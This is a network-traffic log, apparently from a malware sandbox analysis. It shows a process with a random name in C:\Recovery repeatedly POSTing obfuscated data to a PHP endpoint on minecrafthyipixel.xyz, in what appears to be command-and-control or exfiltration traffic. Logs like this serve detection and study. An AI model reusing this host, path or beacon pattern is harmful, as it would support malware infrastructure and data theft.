                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z6N%2F7F43S%2FVn6RgxOePMk1vjdcvae4BzPH%2BSRLJ11kU3Tka2zj%2BFVBZ2DZJh1fBzBuH5XvL8jSz5fjpPnevo20NTtnSiBSNFl%2FrLK78Eh%2BIvn8lMuE%2FCYwC7jTOsuRPJf4TQ3cJ2Kl0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2a22e0a675d-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 58 27 36 32 5e 22 3a 24 00 3d 30 39 07 2a 51 2a 06 2a 2a 29 17 34 3d 37 0b 2c 2a 0a 5d 28 5d 32 15 24 33 21 50 33 03 38 56 25 20 21 59 00 1a 39 58 34 3f 35 11 39 29 0b 1c 28 0f 21 5b 34 0b 2f 5a 3f 2d 32 0d 21 28 23 17 2b 58 3e 0f 3b 5e 30 53 28 38 3e 04 3b 0e 2e 58 22 11 2c 52 09 12 26 0c 3f 38 24 5e 26 56 26 0c 34 32 38 5d 28 3f 39 01 27 2b 28 12 25 55 3b 03 3a 54 25 08 32 00 35 54 28 39 2f 0f 23 5a 35 14 26 14 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$X'62^":$=09*Q***)4=7,*](]2$3!P38V% !Y9X4?59)(![4/Z?-2!(#+X>;^0S(8>;.X",R&?8$^&V&428](?9'+(%U;:T%25T(9/#Z5&.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:43:09.447278023 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    55 | 192.168.2.4 | 49804 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:09.095097065 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:09.199755907 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:09.199933052 CEST | 2512 | OUT | Data Raw: 57 59 5e 5a 59 43 54 5c 5c 5e 59 59 57 55 58 52 54 57 5f 58 54 54 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^ZYCT\\^YYWUXRTW_XTTS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%X66; \$ +3;%>(&_?&>S !"Q=8 <9$[. X -
Apr 19, 2024 13:43:09.553150892 CEST | 615 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:09 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DWRaHC1oGMGrROihRsj1BZ3enNmif8xapqiYGApDYMBK%2BkOwRFcyPLT6s0TpnHihlbttJEmsY5X46quym2gF1ozh7BaGRmToJ4Gf4aHM3Q9WffhFRz8C0jH5EpjPF1j9xJS7kbHHc1o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2a22a47507f-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:09.553212881 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49805 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:09.683151960 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:09.787811995 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:09.788089991 CEST | 2512 | OUT | Data Raw: 57 5f 5b 59 5c 44 54 59 5c 5e 59 59 57 56 58 59 54 55 5f 5a 54 5c 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_[Y\DTY\^YYWVXYTU_ZT\S\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&=!8?007$-V>8X%*,$+#5*/ /%$[. X !
Apr 19, 2024 13:43:10.160159111 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:10 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RhXBj725WwJLioc8G5WIVjIljoLdcjqtjDbqgnCwaMU%2F7ABDwffIONcoBDqoPMNnN4xv3dfO5zKybP0my%2BcRPaNNfTqQzcY183BzrB8yWDuUhxc8HPRwmt7r4NvuL7TWCD45%2FmaLq7o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2a5dae84526-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:10.160223007 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49806 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:10.392694950 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:10.497188091 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:10.497390032 CEST | 2512 | OUT | Data Raw: 57 54 5e 59 59 4b 54 5f 5c 5e 59 59 57 56 58 53 54 52 5f 5d 54 5f 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^YYKT_\^YYWVXSTR_]T_SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'-2!4]$#+[0(-=+$'9%67=8?^4,-5$[. X !
Apr 19, 2024 13:43:10.759898901 CEST | 631 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:10 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=in0lmS%2BMGY3XAiKl7B3Yr7ImPdsuTlHiqJBR%2FB40QaYJd%2FdMfX1YNyAG%2BYtPYd4M%2FWdUbv%2Ffvoy78nY9aUZWJcaWp%2FSKlTcDU0tzRaoRmLf%2Fr36OBj4aYeZesxoTL0crv2tpwgu%2FjhQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2aa48bb4529-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:10.759963036 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49807 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:10.988138914 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:11.092704058 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:11.093775988 CEST | 2504 | OUT | Data Raw: 57 54 5b 5e 59 43 54 5b 5c 5e 59 59 57 57 58 5e 54 55 5f 5f 54 5c 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT[^YCT[\^YYWWX^TU__T\SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\'=55+(&0 '!Q=;?')01(>#"1*+7] Z,_:%$[. X 1
Apr 19, 2024 13:43:11.346618891 CEST | 625 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:11 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SnR%2BQRiSL9MgJytstew053UNRmdg%2B43e2FYmY4ZWsZdi%2FMlhzdUBqpe21UNW5Euyk%2BR781l8DdQQhJqPBU6sjH7wXqYwugDzvZiBmThL6j1%2F981zxm3Ruz4HIETHWlsrhWtWq%2B5BKRs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2ae0cbb7bac-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:11.346684933 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49808 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:11.586021900 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:11.691106081 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:11.691415071 CEST | 2504 | OUT | Data Raw: 52 5e 5e 55 59 43 51 5f 5c 5e 59 59 57 57 58 5d 54 57 5f 5c 54 5d 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^^UYCQ_\^YYWWX]TW_\T]SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\'-"V67$V('*(0%/1+2P!2*+_ < .%$[. X =
Apr 19, 2024 13:43:12.041815042 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:11 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jxj3y9w9KQLqgXaKLN2EfoM2LLQcxiBOhhwi6gh2pH8eeMStoMNGJ2Nba6GGRzgIHLRD6p83IKOVzYl9fXtw813lBcmK9a2vAp%2F0ISMIsZ53Ek9dkOIZq%2F8DDik0EK3rkUC7A0FYC5E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2b1bad7457e-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:12.041877985 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49809 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:12.268150091 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:12.372987986 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:12.373280048 CEST | 2512 | OUT | Data Raw: 57 5e 5e 5f 59 40 54 5f 5c 5e 59 59 57 53 58 5a 54 5b 5f 5b 54 59 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^_Y@T_\^YYWSXZT[_[TYS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z&- ;X$3'[%8!U=;#%_$&*R 2%++, ;9$[. X 5
Apr 19, 2024 13:43:12.739717960 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:12 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QH46xtUpj4GyX2gKPcgnpvdxLx3flGfMPf%2BXHYcjF%2Fcbf9pr8UUTzao03ym8GMH8S6NOEvdQQec%2Bxt8Wl3ZIGPoYy39VqNLbsR66wgC%2FipQZOx1ML6m92ATQshyljejX6QevGwsAVQA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2b60bec12d3-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                     Apr 19, 2024 13:43:12.739784956 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                     61 | 192.168.2.4 | 49810 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                     Apr 19, 2024 13:43:12.978847027 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                     Apr 19, 2024 13:43:13.083214998 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                     Apr 19, 2024 13:43:13.083786011 CEST | 2512 | OUT | Data Raw: 52 5f 5b 5e 5c 43 51 5d 5c 5e 59 59 57 53 58 58 54 5a 5f 56 54 5f 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R_[^\CQ]\^YYWSXXTZ_VT_SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^'-6U6<]$V7\'+->('X%3%*7=]7^7//%$[. X 5
                                                                                                                                     Apr 19, 2024 13:43:13.351658106 CEST | 615 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:13 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ELXinI2fYNMEe6MhLuEwND5qxqKvkSlpzuAKaKRCIlB7BrEaWX6NYnQNzI6Uo2UFOTe2IUqj3RXw46EtIL9tYTn6amObO8S%2BRYImQOlsHLMvgy87iQzlX4V2Fp57yoHan7IcGSi0q04%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2ba79ecb0e5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                     Apr 19, 2024 13:43:13.351725101 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                     62 | 192.168.2.4 | 49811 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                     Apr 19, 2024 13:43:13.585453033 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                     Apr 19, 2024 13:43:13.690002918 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                     Apr 19, 2024 13:43:13.690309048 CEST | 2512 | OUT | Data Raw: 57 5d 5e 5f 59 43 54 5e 5c 5e 59 59 57 56 58 53 54 54 5f 5a 54 5b 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W]^_YCT^\^YYWVXSTT_ZT[S^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1""+&0]0+);+_&,V2.S "=]+4,/5$[. X !
                                                                                                                                     Apr 19, 2024 13:43:14.046247959 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:13 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NcFXNk8kFvuampvG3DA6HOHXEXdY%2BUj8FvEZeY0v8Dxdc4LFi3CpquYtmRF6yy9jWN8q%2BcxjI%2BXQ1zXlXvaRYyU2m7SxkfrFdshE4JVuIsBp8jIqVb4QK405Pt8NCbafrtZC8upmgo8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2be3a927bd8-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                     Apr 19, 2024 13:43:14.046308994 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                     63 | 192.168.2.4 | 49812 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                     Apr 19, 2024 13:43:14.415581942 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                     Apr 19, 2024 13:43:14.520068884 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                     64 | 192.168.2.4 | 49813 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                     Apr 19, 2024 13:43:14.566323996 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
